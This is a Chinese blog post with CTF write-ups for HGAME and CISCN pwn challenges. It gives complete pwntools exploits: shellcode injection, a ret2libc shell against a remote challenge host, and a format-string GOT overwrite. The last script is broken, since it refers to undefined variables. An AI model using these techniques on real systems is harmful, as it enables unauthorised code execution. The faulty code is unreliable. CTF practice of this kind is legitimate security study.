Week 2

PWN
PWN
发布日期:   2024-02-06
文章字数:   433

HGAME PWN

ezshellcode

存在整数溢出,unsigned v4,输入-1,然后给一个shellcode

找一个shellcode放里面

shellcode来源:https://blog.csdn.net/mcmuyanga/article/details/114828207

exp:

from pwn import*

context(log_level='debug',arch='amd64',os='linux')
p=process('./ezshellcode')

p.sendlineafter("of your shellcode:",b'-1')

shellcode=b"Ph0666TY1131Xh333311k13XjiV11Hc1ZXYf1TqIHf9kDqW02DqX0D1Hu3M2G0Z2o4H0u0P160Z0g7O0Z0C100y5O3G020B2n060N4q0n2t0B0001010H3S2y0Y0O0n0z01340d2F4y8P115l1n0J0h0a070t"

p.sendafter("input your shellcode:",shellcode)

p.interactive()

Elden Random Challenge

猜中99个随机数之后有个read的栈溢出,然后就是基础的ret2libc

使用ctypes调用链接库的函数,通过创建cdll.LoadLibary来找出随机数

进入myread函数之后通过read函数与动态链接库,写一个ret2libc

from pwn import *
from ctypes import *

context(log_level='debug',os='linux',arch='amd64',terminal=['tmux','splitw','-h'])

p = remote('106.14.57.14',30931)

elf = ELF('./vuln')
libc = cdll.LoadLibrary('./libc.so.6')

libc.srand(0)  #找种子

p.sendafter("thy name", b'a' * 0x12)

for i in range(0,99):
    m = libc.rand()%100+1
    # print(m)
    p.sendafter("guess the number:",p64(m)) 
    
libc = ELF('./libc.so.6')
puts_got = elf.got['puts']
puts_plt = elf.plt['puts']

pop_rdi = 0x401423
ret = 0x40101A

read = 0x401250 

payload=b'a'*0x38
payload+=p64(pop_rdi)
payload+=p64(puts_got)
payload+=p64(puts_plt)
payload+=p64(read)

p.sendafter("thy brilliant mind.",payload)

libc_base=u64(p.recvuntil("\x7f")[-6:].ljust(8,b'\x00'))-libc.sym['puts']
                 
# print("libc_base=",hex(libc_base))

payload=b'a'*0x38
payload+=p64(ret)
payload+=p64(pop_rdi)
payload+=p64(libc_base+next(libc.search(b'/bin/sh')))
payload+=p64(libc_base+libc.sym['system'])

p.sendline(payload)

p.interactive()

[CISCN 2019西南]PWN1

hgame的fmt没打通,就又找了一道格式化字符串的题

先gdb动调计算出偏移量4,找libc中的printf的got表,system的plt,加上个主函数

修改fini,重新走一遍程序,使用fmtstr把system换上去

from pwn import *
context(log_level='debug',arch='i386', os='linux')

p = process('./pwn')
elf = ELF(pwn)
#rop = ROP(pwn)

libc =elf.libc

io.recvuntil(b"your name?\n")

fini = 0x0804979C  
system_addr = elf.plt['system']
printf_addr = elf.got['printf']
main = elf.symbols['main']

payload = fmtstr_payload(4, {fini :main , printf_addr:system_addr},write_size='short')#write_size有int short 跟byte
print(payload)

io.sendline(payload)

io.recvuntil(b"What's your name?\n")

io.sendline(b'/bin/sh\x00')
io.interactive()
文章作者: J1ton9
文章链接: https://j1ton9.github.io/2024/02/06/week%202/
版权声明: 本博客所有文章除特別声明外,均采用 CC BY 4.0 许可协议。转载请注明来源 J1ton9 !
PWN
评论
评论
  目录
'); }